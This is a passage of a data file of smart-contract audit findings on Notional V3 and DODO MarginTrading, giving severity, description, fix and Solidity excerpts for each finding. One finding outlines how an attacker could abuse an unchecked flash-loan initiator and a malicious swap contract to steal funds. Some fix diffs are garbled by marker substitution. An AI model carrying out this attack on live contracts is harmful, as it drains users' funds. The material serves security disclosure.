receiver,\\n uint256 vaultShares,\\n bytes calldata data\\n) internal returns (uint256 underlyingToReceiver) {\\n uint256 amountTransferred;\\n uint256 underlyingExternalToRepay;\\n {\\n..SNIP..\\n// Add the line below\\n if (vaultShares > 0) {\\n // Repayment checks operate entirely on the underlyingExternalToRepay, the amount of\\n // prime cash raised is irrelevant here since tempCashBalance is cleared to zero as\\n // long as sufficient underlying has been returned to the protocol.\\n (amountTransferred, underlyingToReceiver, /* primeCashRaised */) = _redeem(\\n vaultConfig,\\n underlyingToken,\\n vaultAccount.account,\\n receiver,\\n vaultShares,\\n vaultAccount.maturity,\\n underlyingExternalToRepay,\\n data\\n ); \\n// Add the line below\\n }\\n..Recover any unpaid debt amount from the account directly..\\n..SNIP..\\n```\\n\\nAlternatively, update the `StrategyUtils._redeemStrategyTokens` function to handle zero vault share appropriately. However, note that the revert at Line 154 is added as part of mitigation to the ""minting zero-share"" bug in the past audit. Therefore, any changes to this part of the code must ensure that the ""minting zero-share"" bug is not being re-introduced. Removing the code at 153-155 might result in the user's vault share being ""burned"" but no assets in return under certain conditions.\\n```\\nFile: StrategyUtils.sol\\n function _redeemStrategyTokens(\\n StrategyContext memory strategyContext,\\n uint256 strategyTokens\\n ) internal returns (uint256 poolClaim) {\\n poolClaim = _convertStrategyTokensToPoolClaim(strategyContext, strategyTokens);\\n\\n if (poolClaim == 0) {\\n revert Errors.ZeroPoolClaim();\\n }\\n```\\n","Users cannot repay debt without redeeming their vault shares/strategy tokens. To do so, they have to redeem a certain amount of vault shares/strategy tokens at the current market price to work around this issue so that `poolClaim > 0`, which deprives users of potential gains from their vault shares if they maintain ownership until the end.","```\\nFile: VaultAccountAction.sol\\n function exitVault(\\n address account,\\n address vault,\\n address receiver,\\n uint256 vaultSharesToRedeem,\\n uint256 lendAmount,\\n uint32 minLendRate,\\n bytes calldata exitVaultData\\n ) external payable override nonReentrant returns (uint256 underlyingToReceiver) {\\n..SNIP..\\n // If insufficient strategy tokens are redeemed (or if it is set to zero), then\\n // redeem with debt repayment will recover the repayment from the account's wallet\\n // directly.\\n underlyingToReceiver = underlyingToReceiver.add(vaultConfig.redeemWithDebtRepayment(\\n vaultAccount, receiver, vaultSharesToRedeem, exitVaultData\\n ));\\n```\\n" +Vault account might not be able to exit after liquidation,medium,"The vault exit might fail after a liquidation event, leading to users being unable to main their positions.\\nAssume that a large portion of the vault account gets liquidated which results in a large amount of cash deposited into the vault account's cash balance. In addition, interest will also start accruing within the vault account's cash balance.\\nLet $x$ be the `primaryCash` of a vault account after a liquidation event and interest accrual.\\nThe owner of the vault account decided to exit the vault by calling `exitVault`. Within the `exitVault` function, the `vaultAccount.tempCashBalance` will be set to $x$.\\nNext, the `lendToExitVault` function is called. Assume that the cost in prime cash terms to lend an offsetting fCash position is $-y$ (primeCashCostToLend). The `updateAccountDebt` function will be called, and the `vaultAccount.tempCashBalance` will be updated to $x + (-y) \\Rightarrow x - y$. If $x > y$, then the new `vaultAccount.tempCashBalance` will be more than zero.\\nSubsequently, the `redeemWithDebtRepayment` function will be called. However, since `vaultAccount.tempCashBalance` is larger than zero, the transaction will revert, and the owner cannot exit the vault.\\n```\\nFile: VaultConfiguration.sol\\n if (vaultAccount.tempCashBalance < 0) {\\n int256 x = vaultConfig.primeRate.convertToUnderlying(vaultAccount.tempCashBalance).neg();\\n underlyingExternalToRepay = underlyingToken.convertToUnderlyingExternalWithAdjustment(x).toUint();\\n } else {\\n // Otherwise require that cash balance is zero. Cannot have a positive cash balance in this method\\n require(vaultAccount.tempCashBalance == 0);\\n }\\n```\\n",Consider refunding the excess positive `vaultAccount.tempCashBalance` to the users so that `vaultAccount.tempCashBalance` will be cleared (set to zero) before calling the `redeemWithDebtRepayment` function.,"The owner of the vault account would not be able to exit the vault to main their position. As such, their assets are stuck within the protocol.",```\\nFile: VaultConfiguration.sol\\n if (vaultAccount.tempCashBalance < 0) {\\n int256 x = vaultConfig.primeRate.convertToUnderlying(vaultAccount.tempCashBalance).neg();\\n underlyingExternalToRepay = underlyingToken.convertToUnderlyingExternalWithAdjustment(x).toUint();\\n } else {\\n // Otherwise require that cash balance is zero. Cannot have a positive cash balance in this method\\n require(vaultAccount.tempCashBalance == 0);\\n }\\n```\\n +Rebalance process reverts due to zero amount deposit and redemption,medium,"Depositing or redeeming zero amount against certain external money markets will cause the rebalancing process to revert.\\nFor a specific holding (e.g. cToken), the `redeemAmounts` and `depositAmounts` are mutually exclusive. So if the `redeemAmounts` for a specific holding is non-zero, the `depositAmounts` will be zero and vice-versa. This is because of the if-else block at Lines 48-56 below. Only `redeemAmounts` or `depositAmounts` of a specific holding can be initialized, but not both.\\n```\\nFile: ProportionalRebalancingStrategy.sol\\n for (uint256 i; i < holdings.length;) {\\n address holding = holdings[i];\\n uint256 targetAmount = totalValue * rebalancingTargets[i] / uint256(Constants.PERCENTAGE_DECIMALS);\\n uint256 currentAmount = values[i];\\n\\n redeemHoldings[i] = holding;\\n depositHoldings[i] = holding;\\n\\n if (targetAmount < currentAmount) {\\n unchecked {\\n redeemAmounts[i] = currentAmount - targetAmount;\\n }\\n } else if (currentAmount < targetAmount) {\\n unchecked {\\n depositAmounts[i] = targetAmount - currentAmount;\\n }\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nFor each holding, the following codes always deposit or redeem a zero value. For example, cETH holding, if the `redeemAmounts` is 100 ETH, the `depositAmounts` will be zero. (because of the if-else block). Therefore, `getDepositCalldataForRebalancing` function will be executed and attempt to deposit zero amount to Compound.\\n```\\nFile: ProportionalRebalancingStrategy.sol\\n rebalancingData.redeemData = oracle.getRedemptionCalldataForRebalancing(redeemHoldings, redeemAmounts);\\n rebalancingData.depositData = oracle.getDepositCalldataForRebalancing(depositHoldings, depositAmounts);\\n```\\n\\nThe problem is that the deposit/mint or redeem/burn function of certain external money markets will revert if the amount is zero. Notional is considering integrating with a few external monkey markets and one of them is AAVE.\\nIn this case, when Notional `deposit` zero amount to AAVE or `redeem` zero amount from AAVE, it causes the rebalancing process to revert because of the `onlyAmountGreaterThanZero` modifier on the AAVE's `deposit` and `redeem` function.\\n```\\nfunction deposit(address _reserve, uint256 _amount, uint16 _referralCode)\\n external\\n payable\\n nonReentrant\\n onlyActiveReserve(_reserve)\\n onlyUnfreezedReserve(_reserve)\\n onlyAmountGreaterThanZero(_amount)\\n{\\n```\\n\\n```\\nfunction redeemUnderlying(\\n address _reserve,\\n address payable _user,\\n uint256 _amount,\\n uint256 _aTokenBalanceAfterRedeem\\n)\\n external\\n nonReentrant\\n onlyOverlyingAToken(_reserve)\\n onlyActiveReserve(_reserve)\\n onlyAmountGreaterThanZero(_amount)\\n{\\n```\\n\\nThe above issue is not only limited to AAVE and might also happen in other external markets.","Consider implementing validation to ensure the contract does not deposit zero amount to or redeem zero amount from the external market.\\nFollowing is the pseudocode for the potential fixes that could be implemented within the `_getDepositCalldataForRebalancing` of the holding contract to mitigate this issue. The same should be done for redemption.\\n```\\nfunction _getDepositCalldataForRebalancing(\\n address[] calldata holdings, \\n uint256[] calldata depositAmounts\\n) internal view virtual override returns (\\n DepositData[] memory depositData\\n) {\\n require(holdings.length == NUM_ASSET_TOKENS);\\n for (int i = 0; i < holdings.length; i++) {\\n if (depositAmounts[i] > 0) {\\n // populate the depositData[i] with the deposit calldata to external money market>\\n }\\n }\\n}\\n```\\n\\nThe above solution will return an empty calldata if the deposit amount is zero for a specific holding.\\nWithin the `_executeDeposits` function, skip the `depositData` if it has not been initialized.\\n```\\nfunction _executeDeposits(Token memory underlyingToken, DepositData[] memory deposits) private {\\n uint256 totalUnderlyingDepositAmount;\\n\\n for (uint256 i; i < deposits.length; i++) {\\n DepositData memory depositData = deposits[i];\\n // if depositData is not initialized, skip to the next one\\n```\\n","Notional would not be able to rebalance its underlying holding. The key feature of Notional V3 is to allow its Treasury Manager to rebalance underlying holdings into various other money market protocols.\\nThis makes Notional more resilient to issues in external protocols and future-proofs the protocol. If rebalancing does not work, Notional will be unable to move its fund out of a vulnerable external market, potentially draining protocol funds if this is not mitigated.\\nAnother purpose of rebalancing is to allow Notional to allocate Notional V3's capital to new opportunities or protocols that provide a good return. If rebalancing does not work, the protocol and its users will lose out on the gain from the investment.\\nOn the other hand, if an external monkey market that Notional invested in is consistently underperforming or yielding negative returns, Notional will perform a rebalance to reallocate its funds to a better market. However, if rebalancing does not work, they will be stuck with a suboptimal asset allocation, and the protocol and its users will incur losses.",```\\nFile: ProportionalRebalancingStrategy.sol\\n for (uint256 i; i < holdings.length;) {\\n address holding = holdings[i];\\n uint256 targetAmount = totalValue * rebalancingTargets[i] / uint256(Constants.PERCENTAGE_DECIMALS);\\n uint256 currentAmount = values[i];\\n\\n redeemHoldings[i] = holding;\\n depositHoldings[i] = holding;\\n\\n if (targetAmount < currentAmount) {\\n unchecked {\\n redeemAmounts[i] = currentAmount - targetAmount;\\n }\\n } else if (currentAmount < targetAmount) {\\n unchecked {\\n depositAmounts[i] = targetAmount - currentAmount;\\n }\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n +Inaccurate settlement reserve accounting,medium,"The off-chain accounting of fCash debt or prime cash in the settlement reserve will be inaccurate due to an error when handling the conversion between signed and unsigned integers.\\nEvents will be emitted to reconcile off-chain accounting for the edge condition when leveraged vaults lend at zero interest. This event will be emitted if there is fCash debt or prime cash in the settlement reserve.\\nIn an event where `s.fCashDebtHeldInSettlementReserve > 0` and `s.primeCashHeldInSettlementReserve <= 0`, no event will be emitted. As a result, the off-chain accounting of fCash debt or prime cash in the settlement reserve will be off.\\nThe reason is that since `fCashDebtInReserve` is the negation of `s.fCashDebtHeldInSettlementReserve`, which is an unsigned integer, `fCashDebtInReserve` will always be less than or equal to 0. Therefore, `fCashDebtInReserve` > 0 will always be false and is an unsatisfiable condition.\\n```\\nFile: PrimeRateLib.sol\\n // This is purely done to fully reconcile off chain accounting with the edge condition where\\n // leveraged vaults lend at zero interest.\\n int256 fCashDebtInReserve = -int256(s.fCashDebtHeldInSettlementReserve);\\n int256 primeCashInReserve = int256(s.primeCashHeldInSettlementReserve);\\n if (fCashDebtInReserve > 0 || primeCashInReserve > 0) {\\n int256 settledPrimeCash = convertFromUnderlying(settlementRate, fCashDebtInReserve);\\n int256 excessCash;\\n if (primeCashInReserve > settledPrimeCash) {\\n excessCash = primeCashInReserve - settledPrimeCash;\\n BalanceHandler.incrementFeeToReserve(currencyId, excessCash);\\n } \\n\\n Emitter.emitSettlefCashDebtInReserve(\\n currencyId, maturity, fCashDebtInReserve, settledPrimeCash, excessCash\\n );\\n }\\n```\\n",It is recommended to implement the following fix:\\n```\\n// Remove the line below\\n int256 fCashDebtInReserve = // Remove the line below\\nint256(s.fCashDebtHeldInSettlementReserve);\\n// Add the line below\\n int256 fCashDebtInReserve = int256(s.fCashDebtHeldInSettlementReserve);\\n```\\n,The off-chain accounting of fCash debt or prime cash in the settlement reserve will be inaccurate. Users who rely on inaccurate accounting information to conduct any form of financial transaction will expose themselves to unintended financial risks and make ill-informed decisions.,"```\\nFile: PrimeRateLib.sol\\n // This is purely done to fully reconcile off chain accounting with the edge condition where\\n // leveraged vaults lend at zero interest.\\n int256 fCashDebtInReserve = -int256(s.fCashDebtHeldInSettlementReserve);\\n int256 primeCashInReserve = int256(s.primeCashHeldInSettlementReserve);\\n if (fCashDebtInReserve > 0 || primeCashInReserve > 0) {\\n int256 settledPrimeCash = convertFromUnderlying(settlementRate, fCashDebtInReserve);\\n int256 excessCash;\\n if (primeCashInReserve > settledPrimeCash) {\\n excessCash = primeCashInReserve - settledPrimeCash;\\n BalanceHandler.incrementFeeToReserve(currencyId, excessCash);\\n } \\n\\n Emitter.emitSettlefCashDebtInReserve(\\n currencyId, maturity, fCashDebtInReserve, settledPrimeCash, excessCash\\n );\\n }\\n```\\n" +Rebalance stops working when more holdings are added,medium,"Notional would not be able to rebalance its underlying holding when more holdings are added.\\n```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n\\nIf the underlying delta is equal to or larger than the acceptable delta, the rebalancing process will fail and revert as per Line 301 above.\\n`Constants.REBALANCING_UNDERLYING_DELTA` is currently hardcoded to $0.0001$. There is only 1 holding (cToken) in the current code base, so $0.0001$ might be the optimal acceptable delta.\\nLet $c$ be the underlying delta for cToken holding. Then, $0 <= c < 0.0001$.\\nHowever, as more external markets are added to Notional, the number of holdings will increase, and the rounding errors could accumulate. Let $a$ and $m$ be the underlying delta for aToken and morpho token respectively. Then $0 <= (c + a + m) < 0.0001$.\\nThe accumulated rounding error or underlying delta $(c + a + m)$ could be equal to or larger than $0.0001$ and cause the `_executeRebalance` function always to revert. As a result, Notional would not be able to rebalance its underlying holding.","If the acceptable underlying delta for one holding (cToken) is $\\approx0.0001$, the acceptable underlying delta for three holdings should be $\\approx0.0003$ to factor in the accumulated rounding error or underlying delta.\\nInstead of hardcoding the `REBALANCING_UNDERLYING_DELTA`, consider allowing the governance to adjust this acceptable underlying delta to accommodate more holdings in the future and to adapt to potential changes in market conditions.","Notional would not be able to rebalance its underlying holding. The key feature of Notional V3 is to allow its Treasury Manager to rebalance underlying holdings into various other money market protocols.\\nThis makes Notional more resilient to issues in external protocols and future-proofs the protocol. If rebalancing does not work, Notional will be unable to move its fund out of a vulnerable external market, potentially draining protocol funds if this is not mitigated.\\nAnother purpose of rebalancing is to allow Notional to allocate Notional V3's capital to new opportunities or protocols that provide a good return. If rebalancing does not work, the protocol and its users will lose out on the gain from the investment.\\nOn the other hand, if an external monkey market that Notional invested in is consistently underperforming or yielding negative returns, Notional will perform a rebalance to reallocate its funds to a better market. However, if rebalancing does not work, they will be stuck with a suboptimal asset allocation, and the protocol and its users will incur losses.","```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n" +Underlying delta is calculated on internal token balance,medium,"The underlying delta is calculated on the internal token balance, which might cause inconsistency with tokens of varying decimals.\\n```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n\\nThe `underlyingDelta` is denominated in internal token precision (1e8) and is computed by taking the difference between `totalUnderlyingValueBefore` and `totalUnderlyingValueAfter` in Line 300 above.\\nNext, the `underlyingDelta` is compared against the `Constants.REBALANCING_UNDERLYING_DELTA` (10_000=0.0001) to ensure that the rebalance did not exceed the acceptable delta threshold.\\nHowever, the same `Constants.REBALANCING_UNDERLYING_DELTA` is used across all tokens such as ETH, DAI, and USDC. As a result, the delta will not be consistent with tokens of varying decimals.",Consider using the external token balance and scale `Constants.REBALANCING_UNDERLYING_DELTA` to the token's decimals.,"Using the internal token precision (1e8) might result in an over-sensitive trigger for tokens with fewer decimals (e.g. 1e6) as they are scaled up and an under-sensitive one for tokens with more decimals (e.g. 1e18) as they are scaled down, leading to inconsistency across different tokens when checking against the `Constants.REBALANCING_UNDERLYING_DELTA`.\\nThis also means that the over-sensitive one will trigger a revert more easily and vice versa.","```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n" +Secondary debt dust balances are not truncated,medium,"Dust balances in primary debt are truncated toward zero. However, this truncation was not performed against secondary debts.\\n```\\nFile: VaultAccount.sol\\n function updateAccountDebt(\\n..SNIP..\\n // Truncate dust balances towards zero\\n if (0 < vaultState.totalDebtUnderlying && vaultState.totalDebtUnderlying < 10) vaultState.totalDebtUnderlying = 0;\\n..SNIP..\\n }\\n```\\n\\n`vaultState.totalDebtUnderlying` is primarily used to track the total debt of primary currency. Within the `updateAccountDebt` function, any dust balance in the `vaultState.totalDebtUnderlying` is truncated towards zero at the end of the function as shown above.\\n```\\nFile: VaultSecondaryBorrow.sol\\n function _updateTotalSecondaryDebt(\\n VaultConfig memory vaultConfig,\\n address account,\\n uint16 currencyId,\\n uint256 maturity,\\n int256 netUnderlyingDebt,\\n PrimeRate memory pr\\n ) private {\\n VaultStateStorage storage balance = LibStorage.getVaultSecondaryBorrow()\\n [vaultConfig.vault][maturity][currencyId];\\n int256 totalDebtUnderlying = VaultStateLib.readDebtStorageToUnderlying(pr, maturity, balance.totalDebt);\\n \\n // Set the new debt underlying to storage\\n totalDebtUnderlying = totalDebtUnderlying.add(netUnderlyingDebt);\\n VaultStateLib.setTotalDebtStorage(\\n balance, pr, vaultConfig, currencyId, maturity, totalDebtUnderlying, false // not settled\\n );\\n```\\n\\nHowever, this approach was not consistently applied when handling dust balance in secondary debt within the `_updateTotalSecondaryDebt` function. Within the `_updateTotalSecondaryDebt` function, the dust balance in secondary debts is not truncated.",Consider truncating dust balance in secondary debt within the `_updateTotalSecondaryDebt` function similar to what has been done for primary debt.,"The inconsistency in handling dust balances in primary and secondary debt could potentially lead to discrepancies in debt accounting within the protocol, accumulation of dust, and result in unforeseen consequences.",```\\nFile: VaultAccount.sol\\n function updateAccountDebt(\\n..SNIP..\\n // Truncate dust balances towards zero\\n if (0 < vaultState.totalDebtUnderlying && vaultState.totalDebtUnderlying < 10) vaultState.totalDebtUnderlying = 0;\\n..SNIP..\\n }\\n```\\n +No minimum borrow size check against secondary debts,medium,"Secondary debts were not checked against the minimum borrow size during exit, which could lead to accounts with insufficient debt becoming insolvent and the protocol incurring bad debts.\\n```\\nFile: VaultAccount.sol\\n function _setVaultAccount(\\n..SNIP..\\n // An account must maintain a minimum borrow size in order to enter the vault. If the account\\n // wants to exit under the minimum borrow size it must fully exit so that we do not have dust\\n // accounts that become insolvent.\\n if (\\n vaultAccount.accountDebtUnderlying.neg() < vaultConfig.minAccountBorrowSize &&\\n // During local currency liquidation and settlement, the min borrow check is skipped\\n checkMinBorrow\\n ) {\\n // NOTE: use 1 to represent the minimum amount of vault shares due to rounding in the\\n // vaultSharesToLiquidator calculation\\n require(vaultAccount.accountDebtUnderlying == 0 || vaultAccount.vaultShares <= 1, ""Min Borrow"");\\n }\\n```\\n\\nA vault account has one primary debt (accountDebtUnderlying) and one or more secondary debts (accountDebtOne and accountDebtTwo).\\nWhen a vault account exits the vault, Notional will check that its primary debt (accountDebtUnderlying) meets the minimum borrow size requirement. If a vault account wants to exit under the minimum borrow size it must fully exit so that we do not have dust accounts that become insolvent. This check is being performed in Line 140 above.\\nHowever, this check is not performed against the secondary debts. As a result, it is possible that the secondary debts fall below the minimum borrow size after exiting.",Consider performing a similar check against the secondary debts (accountDebtOne and accountDebtTwo) within the `_setVaultAccount` function to ensure they do not fall below the minimum borrow size.,"Vault accounts with debt below the minimum borrow size are at risk of becoming insolvent, leaving the protocol with bad debts.","```\\nFile: VaultAccount.sol\\n function _setVaultAccount(\\n..SNIP..\\n // An account must maintain a minimum borrow size in order to enter the vault. If the account\\n // wants to exit under the minimum borrow size it must fully exit so that we do not have dust\\n // accounts that become insolvent.\\n if (\\n vaultAccount.accountDebtUnderlying.neg() < vaultConfig.minAccountBorrowSize &&\\n // During local currency liquidation and settlement, the min borrow check is skipped\\n checkMinBorrow\\n ) {\\n // NOTE: use 1 to represent the minimum amount of vault shares due to rounding in the\\n // vaultSharesToLiquidator calculation\\n require(vaultAccount.accountDebtUnderlying == 0 || vaultAccount.vaultShares <= 1, ""Min Borrow"");\\n }\\n```\\n" +It may be possible to liquidate on behalf of another account,medium,"If the caller of any liquidation action is the vault itself, there is no validation of the `liquidator` parameter and therefore, any arbitrary account may act as the `liquidator` if they have approved any amount of funds for the `VaultLiquidationAction.sol` contract.\\nWhile the vault implementation itself should most likely handle proper validation of the parameters provided to actions enabled by the vault, the majority of important validation should be done within the Notional protocol. The base implementation for vaults does not seem to sanitise `liquidator` and hence users could deleverage accounts on behalf of a `liquidator` which has approved Notional's contracts.\\n```\\nFile: VaultLiquidationAction.sol\\n function _authenticateDeleverage(\\n address account,\\n address vault,\\n address liquidator\\n ) private returns (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) {\\n // Do not allow invalid accounts to liquidate\\n requireValidAccount(liquidator);\\n require(liquidator != vault);\\n\\n // Cannot liquidate self, if a vault needs to deleverage itself as a whole it has other methods \\n // in VaultAction to do so.\\n require(account != msg.sender);\\n require(account != liquidator);\\n\\n vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n require(vaultConfig.getFlag(VaultConfiguration.DISABLE_DELEVERAGE) == false);\\n\\n // Authorization rules for deleveraging\\n if (vaultConfig.getFlag(VaultConfiguration.ONLY_VAULT_DELEVERAGE)) {\\n require(msg.sender == vault);\\n } else {\\n require(msg.sender == liquidator);\\n }\\n\\n vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n\\n // Vault accounts that are not settled must be settled first by calling settleVaultAccount\\n // before liquidation. settleVaultAccount is not permissioned so anyone may settle the account.\\n require(block.timestamp < vaultAccount.maturity, ""Must Settle"");\\n\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Returns the updated prime vault state\\n vaultState = vaultAccount.accruePrimeCashFeesToDebtInLiquidation(vaultConfig);\\n } else {\\n vaultState = VaultStateLib.getVaultState(vaultConfig, vaultAccount.maturity);\\n }\\n }\\n```\\n","Make the necessary changes to `BaseStrategyVault.sol` or `_authenticateDeleverage()`, whichever is preferred.",A user may be forced to liquidate an account they do not wish to purchase vault shares for.,"```\\nFile: VaultLiquidationAction.sol\\n function _authenticateDeleverage(\\n address account,\\n address vault,\\n address liquidator\\n ) private returns (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) {\\n // Do not allow invalid accounts to liquidate\\n requireValidAccount(liquidator);\\n require(liquidator != vault);\\n\\n // Cannot liquidate self, if a vault needs to deleverage itself as a whole it has other methods \\n // in VaultAction to do so.\\n require(account != msg.sender);\\n require(account != liquidator);\\n\\n vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n require(vaultConfig.getFlag(VaultConfiguration.DISABLE_DELEVERAGE) == false);\\n\\n // Authorization rules for deleveraging\\n if (vaultConfig.getFlag(VaultConfiguration.ONLY_VAULT_DELEVERAGE)) {\\n require(msg.sender == vault);\\n } else {\\n require(msg.sender == liquidator);\\n }\\n\\n vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n\\n // Vault accounts that are not settled must be settled first by calling settleVaultAccount\\n // before liquidation. settleVaultAccount is not permissioned so anyone may settle the account.\\n require(block.timestamp < vaultAccount.maturity, ""Must Settle"");\\n\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Returns the updated prime vault state\\n vaultState = vaultAccount.accruePrimeCashFeesToDebtInLiquidation(vaultConfig);\\n } else {\\n vaultState = VaultStateLib.getVaultState(vaultConfig, vaultAccount.maturity);\\n }\\n }\\n```\\n" +"MarginTrading.sol: Missing flash loan initiator check allows attacker to open trades, close trades and steal funds",high,"The `MarginTrading.executeOperation` function is called when a flash loan is made (and it can only be called by the lendingPool).\\nThe wrong assumption by the protocol is that the flash loan can only be initiated by the `MarginTrading` contract itself.\\nHowever this is not true. A flash loan can be initiated for any `receiverAddress`.\\n\\nSo an attacker can execute a flash loan with the `MarginTrading` contract as `receiverAddress`. Also the funds that are needed to pay back the flash loan are pulled from the `receiverAddress` and NOT from the initiator:\\nThis means the attacker can close a position or repay a position in the `MarginTrading` contract.\\nBy crafting a malicious swap, the attacker can even steal funds.\\nLet's assume there is an ongoing trade in a `MarginTrading` contract:\\n```\\ndaiAToken balance = 30000\\nwethDebtToken balance = 10\\n\\nThe price of WETH when the trade was opened was ~ 3000 DAI\\n```\\n\\nIn order to profit from this the attacker does the following (not considering fees for simplicity):\\nTake a flash loan of 30000 DAI with `MarginTrading` as `receiverAddress` with `mode=0` (flash loan is paid back in the same transaction)\\nPrice of WETH has dropped to 2000 DAI. The attacker uses a malicious swap contract that pockets 10000 DAI for the attacker and swaps the remaining 20000 DAI to 10 WETH (the attacker can freely choose the swap contract in the `_params` of the flash loan).\\nThe 10 WETH debt is repaid\\nWithdraw 30000 DAI from Aave to pay back the flash loan","The fix is straightforward:\\n```\\ndiff --git a/dodo-margin-trading-contracts/contracts/marginTrading/MarginTrading.sol b/dodo-margin-trading-contracts/contracts/marginTrading/MarginTrading.sol\\nindex f68c1f3..5b4b485 100644\\n--- a/dodo-margin-trading-contracts/contracts/marginTrading/MarginTrading.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/dodo-margin-trading-contracts/contracts/marginTrading/MarginTrading.sol\\n@@ -125,6 // Add the line below\\n125,7 @@ contract MarginTrading is OwnableUpgradeable, IMarginTrading, IFlashLoanReceiver\\n address _initiator,\\n bytes calldata _params\\n ) external override onlyLendingPool returns (bool) {\\n// Add the line below\\n require(_initiator == address(this));\\n //decode params exe swap and deposit\\n {\\n```\\n\\nThis ensures that the flash loan has been initiated by the `MarginTrading.executeFlashLoans` function which is the intended initiator.","The attacker can close trades, partially close trades and even steal funds.\\n(Note: It's not possible for the attacker to open trades because he cannot incur debt on behalf of the `MarginTrading` contract)",```\\ndaiAToken balance = 30000\\nwethDebtToken balance = 10\\n\\nThe price of WETH when the trade was opened was ~ 3000 DAI\\n```\\n +MarginTrading.sol: The whole balance and not just the traded funds are deposited into Aave when a trade is opened,medium,"It's expected by the protocol that funds can be in the `MarginTrading` contract without being deposited into Aave as margin.\\nWe can see this by looking at the `MarginTradingFactory.depositMarginTradingETH` and `MarginTradingFactory.depositMarginTradingERC20` functions.\\nIf the user sets `margin=false` as the parameter, the funds are only sent to the `MarginTrading` contract but NOT deposited into Aave.\\nSo clearly there is the expectation for funds to be in the `MarginTrading` contract that should not be deposited into Aave.\\nThis becomes an issue when a trade is opened.\\nLet's look at the `MarginTrading._openTrade` function that is called when a trade is opened:\\nThe whole balance of the token will be deposited into Aave:\\n```\\n_tradeAmounts[i] = IERC20(_tradeAssets[i]).balanceOf(address(this)); \\n_lendingPoolDeposit(_tradeAssets[i], _tradeAmounts[i], 1); \\n```\\n\\nNot just those funds that have been acquired by the swap. This means that funds that should stay in the `MarginTrading` contract might also be 